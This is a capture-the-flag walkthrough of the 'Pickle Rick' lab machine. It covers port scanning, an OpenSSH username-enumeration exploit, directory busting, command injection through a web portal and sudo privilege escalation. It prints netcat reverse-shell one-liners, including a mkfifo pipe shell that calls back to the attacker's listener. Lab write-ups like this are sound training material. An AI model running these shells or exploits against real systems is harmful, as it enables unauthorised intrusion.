Today we will be exploring a Rick and Morty themed machine, where we need to find 3 ingredients to bring Rick into his human form from a pickle.
Let’s start off by scanning the machine with Nmap with a quick port scan.
nmap -p- -T4 –reason IPAddress
-T4 second fastest scan speed
-p- scan all ports
–reason display why Nmap thinks a port is open or closed
Now we want to run service enumeration against those ports that were open.
nmap -p22,80 -sV –reason -T4 IPAddress
Let’s check out the web page on port 443. Looks like Rick has changed himself into a pickle and is having some Burps. That must be a hint to use Burp Suite to find the ingredients. Open up Burp Suite, and if you have the latest version, you can open a browser within Burp. This way all the traffic goes through the Burp Proxy, but you don’t have to do any additional configuration.
Once Burp Suite opens, click on the Proxy tab, then intercept. Now click on Open Browser. This will ensure all our traffic goes through Burp.
You can turn intercept off to just go explore the website without having to forward all the requests. Traffic will still route through burp, so you can view them later in HTTP history.
Once you visit the home page, right click and then select Inspect. If we look at the source code, there’s a note to use that the username is R1ckRul3s.
If we look at the robots.txt file we see Wubbalubbadubdub. The robots.txt file is a place where you can tell search engines what pages they aren’t allowed to store for their search results. For example, you wouldn’t want them to store customer data pages, such as order records, on the search engine. Then anyone could view something that only an authorized user should see.
After searching the SSH version it seems we may have username enumeration. Search google for OpenSSH7.2p2, and we can find some exploit code. We need to create a user list.
https://www.exploit-db.com/exploits/40136
Save the code as UsernameEnum.py. Add rick, morty, Rick, Morty, Pickle, pickle, and R1ckRul3s to a text file called Userlist.txt.
Run the exploit by running python3 UsernameEnum.py -U Userlist.txt IPAddress
We get an error that time doesn’t have a clock attribute. If we Google that it seems it has been replaced with perf_counter() or process_time().
nano UsernameEnum.py
Hit CTRL + \ for find and replace
search for clock and replace it with process_time. It should replace 2 instances. Save it and run the exploit again and you will start your username enumeration.
Doesn’t look like any of our usernames worked. This exploit is trying to see how long it takes SSH to respond to us. If it takes a certain amount of time, then the user would exist.
Let’s try to run GoBuster to find some hidden directories. We will use the dir mode for directory busting and -x to specify extensions. Apache normally has php extensions so we will try that first.
gobuster dir -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://IPAddress
Right away we get some hits! Let’s go explore login and portal.
Remember that we found the username in the comments of the main web page, and there was a strange entry in robots.txt. Turns out that is our password so login with
R1ckRul3s
Wubbalubbadubdub
We can run commands directly on the operating system, let’s hunt for the ingredients.
ls
cat Sup3rS3cretPickl3Ingred.txt
Well played. :/ Maybe we can use xxd to gain information about the file. xxd will create a hex dump of the file, possibly reviewing the contents.
xxd Sup3rS3cretPickl3Ingred.txt
That’s our first ingredient!
Let’s keep looking around the file system.
ls -R /home
xxd “/home/rick/second ingredients”
cat /etc/password
This shows us a Ubuntu user. Good to note, maybe we can find their password later.
I wonder if we can get a reverse shell. Let’s look for a tool called netcat. This tool allows you to read and write data across network connections. This makes it a great way to get shells or transfer documents from host to host.
which nc
Let’s set up a listener on our attacker machine. This will listen for connections coming from other machines.
nc -nlvp 1337
Now under commands run the following to get a shell!
nc IPAddress 1337 -e /bin/sh
Well so I thought, no shell :/ I have seen that the -e option for execute, may also be the -c option, so let’s try that. This time I am writing any output in a file, because I was having issues getting the command to work.
nc IPAddress 1337 -c /bin/sh > /tmp/error.txt && xxd /tmp/error.txt
Oh it looks like we have the minimum version of netcat without the nice features.
None of my shells were working so I found a great article on how to get a netcat shell with a limited version of netcat.
NOTE: We have a listener set up on port 1337. If yours isn’t running anymore start it again with
nc -nlvp 1337
I want to be sure I am in a writeable directory so move into /tmp. Then we open a pipe via mkfifo, then run bash and redirect the flow. Great article on getting shells with neutered netcat. (https://dharma-adiputra.medium.com/neutered-netcat-no-prob-1ac188449d1) You can replace /bin/sh with /bin/bash or once you land you can get a bash shell by running /bin/bash -i.
cd /tmp && mkfifo f && nc IP Port 0<f | /bin/sh -i 2>&1 | tee f
I believe the third ingredient will be within the website potentially so let’s check out that directory. We were interacting with portal.php so let’s read the code.
cd /var/www/html
cat portal.php
Looks like this is what was preventing us for using some of the commands to read files such as cat, more, and tail. Good thing they forgot about xxd!
It looks like they were making everything go to denied.php which is why we can’t click on any other tabs on the website. Maybe the third ingredient isn’t on the website.
We can look at login.php to see how authentication works.
Looks like we can confirm that there’s only the one user on the website, confirming the ingredients can’t be on the website pages we can’t see.
Maybe only root can see the third ingredient. Let’s start to try and privilege escalate.
First check if www-data can run any commands as root.
sudo -l
WOW, we can run any command as root we want without a password. This is an easy way to become root!
Let’s spawn an interactive root shell.
sudo /bin/bash -i
Now where is that third ingredient?
After searching the file system for the term “third” I wasn’t finding anything.
cd /root
ls
cat 3rd.txt
Turns out they just titled it differently!
Hope you enjoyed the adventure through Pickle Rick. While this wasn’t rated very difficult, there’s a few little tricks that caused me some trouble.